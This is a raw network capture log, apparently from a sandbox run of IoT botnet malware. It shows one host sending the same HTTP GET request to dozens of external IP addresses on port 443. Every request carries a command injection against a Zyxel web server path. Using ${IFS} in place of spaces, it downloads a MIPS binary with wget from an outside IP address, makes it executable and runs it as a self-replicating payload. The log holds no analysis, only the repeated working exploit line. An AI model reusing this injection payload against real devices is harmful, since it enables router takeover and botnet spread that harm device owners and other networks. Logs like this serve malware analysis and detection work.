                                                Jan 12, 2024 18:24:29.682522058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2777192.168.2.1346450183.71.39.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682573080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2778192.168.2.136072643.86.223.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682595015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2779192.168.2.1335754208.161.141.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682647943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2780192.168.2.1358798139.189.30.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682703018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2781192.168.2.135546043.242.209.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682759047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2782192.168.2.135357063.142.186.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682791948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2783192.168.2.135729818.142.159.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682838917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2784192.168.2.134249646.65.85.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682881117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2785192.168.2.1334142130.22.168.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682946920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2786192.168.2.133371487.92.70.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682981014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2787192.168.2.1354168208.221.91.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683021069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2788192.168.2.1344892210.20.122.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683082104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2789192.168.2.13559905.40.213.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683130026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2790192.168.2.134478270.179.201.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683182955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2791192.168.2.1334346206.183.217.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683238029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2792192.168.2.133357260.219.88.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683284998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2793192.168.2.1354802137.88.147.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683304071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2794192.168.2.135309824.115.229.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683372021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2795192.168.2.1334374161.106.22.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683410883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2796192.168.2.1343102212.95.37.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683453083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2797192.168.2.1347452201.236.131.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683465958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2798192.168.2.1338926125.168.50.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683505058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2799192.168.2.1345382178.44.204.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683552980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2800192.168.2.1358750203.240.24.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683590889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2801192.168.2.1349700143.134.28.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683645010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2802192.168.2.1352836133.0.124.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683689117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2803192.168.2.1343620163.180.235.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683718920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2804192.168.2.1345514116.123.216.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683763981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2805192.168.2.135942063.216.130.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683815002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2806192.168.2.134373493.139.220.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683836937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2807192.168.2.1340598117.46.221.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683872938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2808192.168.2.1338236190.141.243.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683917046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2809192.168.2.1333038138.250.67.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683955908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2810192.168.2.1336338177.104.179.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.683994055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2811192.168.2.134970653.15.70.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684041977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2812192.168.2.1340480104.103.221.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684094906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2813192.168.2.135175441.51.51.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684139967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2814192.168.2.135177271.196.105.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684158087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2815192.168.2.1359994111.26.57.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684237957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2816192.168.2.1342442151.146.205.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684268951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2817192.168.2.1358054196.197.19.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684310913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2818192.168.2.1360148148.104.218.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684340954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2819192.168.2.1354262213.89.101.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684396029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2820192.168.2.134126814.77.228.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684423923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2821192.168.2.135891451.122.170.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684468985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2822192.168.2.1342684190.215.173.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684505939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2823192.168.2.1333704175.36.55.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684535980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2824192.168.2.1334586167.131.166.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684593916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2825192.168.2.135231265.51.227.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684614897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2826192.168.2.1345678116.46.79.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684647083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2827192.168.2.1353542129.212.85.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684716940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2828192.168.2.1355304102.112.203.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684763908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2829192.168.2.1347152196.104.187.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684787035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2830192.168.2.1348216209.138.19.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684818029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2831192.168.2.1354130196.213.142.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684869051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2832192.168.2.134767485.130.24.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684885979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2833192.168.2.1350026203.66.102.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684921026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2834192.168.2.1334030190.172.185.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684956074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2835192.168.2.1355894202.244.122.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.684995890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2836192.168.2.1346704196.10.156.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685034990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2837192.168.2.133344243.184.32.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685076952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2838192.168.2.135112089.146.132.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685118914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2839192.168.2.1360586140.167.6.194443
                                                TimestampBytes transferredDirectionData
